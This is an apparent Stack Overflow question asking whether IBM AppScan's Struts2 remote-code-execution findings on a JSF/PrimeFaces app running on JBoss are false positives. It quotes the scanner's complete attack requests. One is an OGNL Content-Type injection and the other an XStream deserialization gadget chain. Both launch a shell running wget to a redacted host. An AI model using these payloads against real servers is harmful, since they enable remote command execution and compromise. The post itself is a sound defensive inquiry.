Question
We recently received results from IBM AppScan DAST and some of the results don't make much sense. The first 2 High issues show the application as being Struts2, which is incorrect since it is a JSF 2.2, Primefaces 7.0.9 application running on JBOSS EAP 7.2 (JSF version 2.3). I don't even see Struts in the JBOSS modules / jars.
1. High -- Apache Struts2 Remote Code Execution
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents.
Fix: Upgrade to the latest version of Apache Struts.
GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
It seems the response is HTTP/1.1 200 OK, which AppScan believes is a vulnerability.
We were told we should check the Content-Type of the request header. I have not come across anything like this in any past DAST. Has anyone done something like this before in JSF?
2. High -- Apache Struts2 REST Plugin XStream Remote Code Execution
POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator" />
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>cmd.exe</string>
                        <string>/C</string>
                        <string>"wget http://***:**/AppScanMsg.html?varId=6107"</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types />
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock />
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream" />
              <ibuffer />
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors />
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString" />
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString" />
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString" />
  </entry>
</map>
It seems the response is HTTP/1.1 200 OK, which AppScan believes is a vulnerability.
Our web.xml has the error pages defined, and client-side state saving:
<error-page>
    <error-code>404</error-code>
    <location>/error/404.xhtml</location>
</error-page>
<error-page>
    <error-code>500</error-code>
    <exception-type>java.lang.RuntimeException</exception-type>
    <location>/error/access.xhtml</location>
</error-page>
<error-page>
    <location>/error/error.xhtml</location>
</error-page>
<context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>client</param-value>
</context-param>
Has anyone seen similar issues from DAST? Could some of these be false positives? Looking for feedback and some insight.
Other issues:
- IBM AppScan - Blind SQL Injection (Time Based) - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Java Deserialization Code Execution - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Port Listener Command Injection - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
- IBM AppScan - Cross-Site Request Forgery - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
Link: CSRF, XSS and SQL Injection attack prevention in JSF
Source: https://stackoverflow.com/questions/61671067/ibm-appscan-struts2-issue-reported-on-a-jsf-2-2-primefaces-jboss-7-2-eap